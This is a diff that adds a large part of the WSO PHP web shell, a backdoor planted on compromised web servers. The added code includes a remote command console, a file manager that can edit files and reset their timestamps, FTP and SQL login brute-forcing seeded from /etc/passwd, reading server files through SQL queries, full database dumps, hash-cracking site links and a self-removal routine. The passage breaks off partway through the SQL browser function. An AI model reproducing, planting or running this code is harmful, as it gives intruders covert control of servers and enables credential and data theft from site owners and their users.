+	$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
+	if($dirContent === false) {	echo 'Can\'t open this folder!';wsoFooter(); return; }
+	global $sort;
+	$sort = array('name', 1);
+	if(!empty($_POST['p1'])) {
+		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
+			$sort = array($match[1], (int)$match[2]);
+	}
+echo "<script>
+	function sa() {
+		for(i=0;i<d.files.elements.length;i++)
+			if(d.files.elements[i].type == 'checkbox')
+				d.files.elements[i].checked = d.files.elements[0].checked;
+	}
+</script>
+<table width='100%' class='main' cellspacing='0' cellpadding='2'>
+<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
+	$dirs = $files = array();
+	$n = count($dirContent);
+	for($i=0;$i<$n;$i++) {
+		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
+		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
+		$tmp = array('name' => $dirContent[$i],
+					 'path' => $GLOBALS['cwd'].$dirContent[$i],
+					 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
+					 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
+					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
+					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
+					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
+					);
+		if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
+			$files[] = array_merge($tmp, array('type' => 'file'));
+		elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
+			$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
+		elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
+			$dirs[] = array_merge($tmp, array('type' => 'dir'));
+	}
+	$GLOBALS['sort'] = $sort;
+	function wsoCmp($a, $b) {
+		if($GLOBALS['sort'][0] != 'size')
+			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
+		else
+			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
+	}
+	usort($files, "wsoCmp");
+	usort($dirs, "wsoCmp");
+	$files = array_merge($dirs, $files);
+	$l = 0;
+	foreach($files as $f) {
+		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
+			.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
+		$l = $l?0:1;
+	}
+	echo "<tr><td colspan=7>
+	<input type=hidden name=a value='FilesMan'>
+	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
+	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
+	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
+    if(class_exists('ZipArchive'))
+        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
+    echo "<option value='tar'>Compress (tar.gz)</option>";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
+        echo "<option value='paste'>Paste / Compress</option>";
+    echo "</select>&nbsp;";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
+        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
+    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
+	wsoFooter();
+}
+
+function actionStringTools() {
+	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
+    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
+	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
+	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
+	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
+	$stringTools = array(
+		'Base64 encode' => 'base64_encode',
+		'Base64 decode' => 'base64_decode',
+		'Url encode' => 'urlencode',
+		'Url decode' => 'urldecode',
+		'Full urlencode' => 'full_urlencode',
+		'md5 hash' => 'md5',
+		'sha1 hash' => 'sha1',
+		'crypt' => 'crypt',
+		'CRC32' => 'crc32',
+		'ASCII to HEX' => 'ascii2hex',
+		'HEX to ASCII' => 'hex2ascii',
+		'HEX to DEC' => 'hexdec',
+		'HEX to BIN' => 'hex2bin',
+		'DEC to HEX' => 'dechex',
+		'DEC to BIN' => 'decbin',
+		'BIN to HEX' => 'binhex',
+		'BIN to DEC' => 'bindec',
+		'String to lower case' => 'strtolower',
+		'String to upper case' => 'strtoupper',
+		'Htmlspecialchars' => 'htmlspecialchars',
+		'String length' => 'strlen',
+	);
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		if(in_array($_POST['p1'], $stringTools))
+			echo $_POST['p1']($_POST['p2']);
+		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+	echo '<h1>String conversions</h1><div class=content>';
+	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
+	foreach($stringTools as $k => $v)
+		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
+		echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
+	if(!empty($_POST['p1'])) {
+		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+	}
+	echo"</pre></div><br><h1>Search files:</h1><div class=content>
+		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
+			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
+			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
+			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
+			<tr><td></td><td><input type='submit' value='>>'></td></tr>
+			</table></form>";
+
+	function wsoRecursiveGlob($path) {
+		if(substr($path, -1) != '/')
+			$path.='/';
+		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
+		if(is_array($paths)&&@count($paths)) {
+			foreach($paths as $item) {
+				if(@is_dir($item)){
+					if($path!=$item)
+						wsoRecursiveGlob($item);
+				} else {
+					if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
+						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
+				}
+			}
+		}
+	}
+	if(@$_POST['p3'])
+		wsoRecursiveGlob($_POST['c']);
+	echo "</div><br><h1>Search for hash:</h1><div class=content>
+		<form method='post' target='_blank' name='hf'>
+			<input type='text' name='hash' style='width:200px;'><br>
+            <input type='hidden' name='act' value='find'/>
+			<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
+			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
+            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
+		</form></div>";
+	wsoFooter();
+}
+
+function actionFilesTools() {
+	if( isset($_POST['p1']) )
+		$_POST['p1'] = urldecode($_POST['p1']);
+	if(@$_POST['p2']=='download') {
+		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
+			ob_start("ob_gzhandler", 4096);
+			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
+			if (function_exists("mime_content_type")) {
+				$type = @mime_content_type($_POST['p1']);
+				header("Content-Type: " . $type);
+			} else
+                header("Content-Type: application/octet-stream");
+			$fp = @fopen($_POST['p1'], "r");
+			if($fp) {
+				while(!@feof($fp))
+					echo @fread($fp, 1024);
+				fclose($fp);
+			}
+		}exit;
+	}
+	if( @$_POST['p2'] == 'mkfile' ) {
+		if(!file_exists($_POST['p1'])) {
+			$fp = @fopen($_POST['p1'], 'w');
+			if($fp) {
+				$_POST['p2'] = "edit";
+				fclose($fp);
+			}
+		}
+	}
+	wsoHeader();
+	echo '<h1>File tools</h1><div class=content>';
+	if( !file_exists(@$_POST['p1']) ) {
+		echo 'File not exists';
+		wsoFooter();
+		return;
+	}
+	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
+	if(!$uid) {
+		$uid['name'] = @fileowner($_POST['p1']);
+		$gid['name'] = @filegroup($_POST['p1']);
+	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
+	echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
+	if( empty($_POST['p2']) )
+		$_POST['p2'] = 'view';
+	if( is_file($_POST['p1']) )
+		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
+	else
+		$m = array('Chmod', 'Rename', 'Touch');
+	foreach($m as $v)
+		echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
+	echo '<br><br>';
+	switch($_POST['p2']) {
+		case 'view':
+			echo '<pre class=ml1>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</pre>';
+			break;
+		case 'highlight':
+			if( @is_readable($_POST['p1']) ) {
+				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
+				$code = @highlight_file($_POST['p1'],true);
+				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
+			}
+			break;
+		case 'chmod':
+			if( !empty($_POST['p3']) ) {
+				$perms = 0;
+				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
+					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
+				if(!@chmod($_POST['p1'], $perms))
+					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
+			break;
+		case 'edit':
+			if( !is_writable($_POST['p1'])) {
+				echo 'File isn\'t writeable';
+				break;
+			}
+			if( !empty($_POST['p3']) ) {
+				$time = @filemtime($_POST['p1']);
+				$_POST['p3'] = substr($_POST['p3'],1);
+				$fp = @fopen($_POST['p1'],"w");
+				if($fp) {
+					@fwrite($fp,$_POST['p3']);
+					@fclose($fp);
+					echo 'Saved!<br><script>p3_="";</script>';
+					@touch($_POST['p1'],$time,$time);
+				}
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</textarea><input type=submit value=">>"></form>';
+			break;
+		case 'hexdump':
+			$c = @file_get_contents($_POST['p1']);
+			$n = 0;
+			$h = array('00000000<br>','','');
+			$len = strlen($c);
+			for ($i=0; $i<$len; ++$i) {
+				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
+				switch ( ord($c[$i]) ) {
+					case 0:  $h[2] .= ' '; break;
+					case 9:  $h[2] .= ' '; break;
+					case 10: $h[2] .= ' '; break;
+					case 13: $h[2] .= ' '; break;
+					default: $h[2] .= $c[$i]; break;
+				}
+				$n++;
+				if ($n == 32) {
+					$n = 0;
+					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
+					$h[1] .= '<br>';
+					$h[2] .= "\n";
+				}
+		 	}
+			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
+			break;
+		case 'rename':
+			if( !empty($_POST['p3']) ) {
+				if(!@rename($_POST['p1'], $_POST['p3']))
+					echo 'Can\'t rename!<br>';
+				else
+					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
+			break;
+		case 'touch':
+			if( !empty($_POST['p3']) ) {
+				$time = strtotime($_POST['p3']);
+				if($time) {
+					if(!touch($_POST['p1'],$time,$time))
+						echo 'Fail!';
+					else
+						echo 'Touched!';
+				} else echo 'Bad time format!';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
+			break;
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionConsole() {
+    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
+        $_POST['p1'] .= ' 2>&1';
+    } elseif(!empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
+
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		echo "d.cf.cmd.value='';\n";
+		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
+		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
+			if(@chdir($match[1])) {
+				$GLOBALS['cwd'] = @getcwd();
+				echo "c_='".$GLOBALS['cwd']."';";
+			}
+		}
+		echo "d.cf.output.value+='".$temp."';";
+		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
+		$temp = ob_get_clean();
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+    echo "<script>
+if(window.Event) window.captureEvents(Event.KEYDOWN);
+var cmds = new Array('');
+var cur = 0;
+function kp(e) {
+	var n = (window.Event) ? e.which : e.keyCode;
+	if(n == 38) {
+		cur--;
+		if(cur>=0)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur++;
+	} else if(n == 40) {
+		cur++;
+		if(cur < cmds.length)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur--;
+	}
+}
+function add(cmd) {
+	cmds.pop();
+	cmds.push(cmd);
+	cmds.push('');
+	cur = cmds.length-1;
+}
+</script>";
+	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
+	foreach($GLOBALS['aliases'] as $n => $v) {
+		if($v == '') {
+			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
+			continue;
+		}
+		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
+	}
+	
+	echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
+	if(!empty($_POST['p1'])) {
+		echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
+	}
+	echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
+	echo '</form></div><script>d.cf.cmd.focus();</script>';
+	wsoFooter();
+}
+
+function actionLogout() {
+    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
+	die('bye!');
+}
+
+function actionSelfRemove() {
+
+	if($_POST['p1'] == 'yes')
+		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
+			die('Shell has been removed');
+		else
+			echo 'unlink error!';
+    if($_POST['p1'] != 'yes')
+        wsoHeader();
+	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
+	wsoFooter();
+}
+
+function actionBruteforce() {
+	wsoHeader();
+	if( isset($_POST['proto']) ) {
+		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
+		if( $_POST['proto'] == 'ftp' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$fp = @ftp_connect($ip, $port?$port:21);
+				if(!$fp) return false;
+				$res = @ftp_login($fp, $login, $pass);
+				@ftp_close($fp);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'mysql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
+				@mysql_close($res);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'pgsql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
+				$res = @pg_connect($str);
+				@pg_close($res);
+				return $res;
+			}
+		}
+		$success = 0;
+		$attempts = 0;
+		$server = explode(":", $_POST['server']);
+		if($_POST['type'] == 1) {
+			$temp = @file('/etc/passwd');
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = explode(":", $line);
+					++$attempts;
+					if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
+					}
+					if(@$_POST['reverse']) {
+						$tmp = "";
+						for($i=strlen($line[0])-1; $i>=0; --$i)
+							$tmp .= $line[0][$i];
+						++$attempts;
+						if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
+							$success++;
+							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
+						}
+					}
+				}
+		} elseif($_POST['type'] == 2) {
+			$temp = @file($_POST['dict']);
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = trim($line);
+					++$attempts;
+					if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
+					}
+				}
+		}
+		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
+	}
+	echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
+		.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
+		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
+		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
+		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
+		.'<span>Server:port</span></td>'
+		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
+		.'<tr><td><span>Brute type</span></td>'
+		.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
+		.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
+		.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
+		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
+		.'<td><input type=text name=login value="root"></td></tr>'
+		.'<tr><td><span>Dictionary</span></td>'
+		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
+		.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
+	echo '</div><br>';
+	wsoFooter();
+}
+
+function actionSql() {
+	class DbClass {
+		var $type;
+		var $link;
+		var $res;
+		function DbClass($type)	{
+			$this->type = $type;
+		}
+		function connect($host, $user, $pass, $dbname){
+			switch($this->type)	{
+				case 'mysql':
+					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
+					break;
+				case 'pgsql':
+					$host = explode(':', $host);
+					if(!$host[1]) $host[1]=5432;
+					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
+					break;
+			}
+			return false;
+		}
+		function selectdb($db) {
+			switch($this->type)	{
+				case 'mysql':
+					if (@mysql_select_db($db))return true;
+					break;
+			}
+			return false;
+		}
+		function query($str) {
+			switch($this->type) {
+				case 'mysql':
+					return $this->res = @mysql_query($str);
+					break;
+				case 'pgsql':
+					return $this->res = @pg_query($this->link,$str);
+					break;
+			}
+			return false;
+		}
+		function fetch() {
+			$res = func_num_args()?func_get_arg(0):$this->res;
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_fetch_assoc($res);
+					break;
+				case 'pgsql':
+					return @pg_fetch_assoc($res);
+					break;
+			}
+			return false;
+		}
+		function listDbs() {
+			switch($this->type)	{
+				case 'mysql':
+                        return $this->query("SHOW databases");
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
+				break;
+			}
+			return false;
+		}
+		function listTables() {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->res = $this->query('SHOW TABLES');
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
+				break;
+			}
+			return false;
+		}
+		function error() {
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_error();
+				break;
+				case 'pgsql':
+					return @pg_last_error();
+				break;
+			}
+			return false;
+		}
+		function setCharset($str) {
+			switch($this->type)	{
+				case 'mysql':
+					if(function_exists('mysql_set_charset'))
+						return @mysql_set_charset($str, $this->link);
+					else
+						$this->query('SET CHARSET '.$str);
+					break;
+				case 'pgsql':
+					return @pg_set_client_encoding($this->link, $str);
+					break;
+			}
+			return false;
+		}
+		function loadFile($str) {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
+				break;
+				case 'pgsql':
+					$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
+					$r=array();
+					while($i=$this->fetch())
+						$r[] = $i['file'];
+					$this->query('drop table wso2');
+					return array('file'=>implode("\n",$r));
+				break;
+			}
+			return false;
+		}
+		function dump($table, $fp = false) {
+			switch($this->type)	{
+				case 'mysql':
+					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
+					$create = mysql_fetch_array($res);
+					$sql = $create[1].";\n";
+                    if($fp) fwrite($fp, $sql); else echo($sql);
+					$this->query('SELECT * FROM `'.$table.'`');
+                    $i = 0;
+                    $head = true;
+					while($item = $this->fetch()) {
+                        $sql = '';
+                        if($i % 1000 == 0) {
+                            $head = true;
+                            $sql = ";\n\n";
+                        }
+
+						$columns = array();
+						foreach($item as $k=>$v) {
+                            if($v === null)
+                                $item[$k] = "NULL";
+                            elseif(is_int($v))
+                                $item[$k] = $v;
+                            else
+                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
+							$columns[] = "`".$k."`";
+						}
+                        if($head) {
+                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
+                            $head = false;
+                        } else
+                            $sql .= "\n\t,(".implode(", ", $item).')';
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+                        $i++;
+					}
+                    if(!$head)
+                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
+				break;
+				case 'pgsql':
+					$this->query('SELECT * FROM '.$table);
+					while($item = $this->fetch()) {
+						$columns = array();
+						foreach($item as $k=>$v) {
+							$item[$k] = "'".addslashes($v)."'";
+							$columns[] = $k;
+						}
+                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+					}
+				break;
+			}
+			return false;
+		}
+	};
+	$db = new DbClass($_POST['type']);
+	if(@$_POST['p2']=='download') {
+		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
+		$db->selectdb($_POST['sql_base']);
+        switch($_POST['charset']) {
+            case "Windows-1251": $db->setCharset('cp1251'); break;
+            case "UTF-8": $db->setCharset('utf8'); break;
+            case "KOI8-R": $db->setCharset('koi8r'); break;
+            case "KOI8-U": $db->setCharset('koi8u'); break;
+            case "cp866": $db->setCharset('cp866'); break;
+        }
+        if(empty($_POST['file'])) {
+            ob_start("ob_gzhandler", 4096);
+            header("Content-Disposition: attachment; filename=dump.sql");
+            header("Content-Type: text/plain");
+            foreach($_POST['tbl'] as $v)
+				$db->dump($v);
+            exit;
+        } elseif($fp = @fopen($_POST['file'], 'w')) {
+            foreach($_POST['tbl'] as $v)
+                $db->dump($v, $fp);
+            fclose($fp);
+            unset($_POST['p2']);
+        } else
+            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
+	}
+	wsoHeader();
+	echo "
+<h1>Sql browser</h1><div class=content>
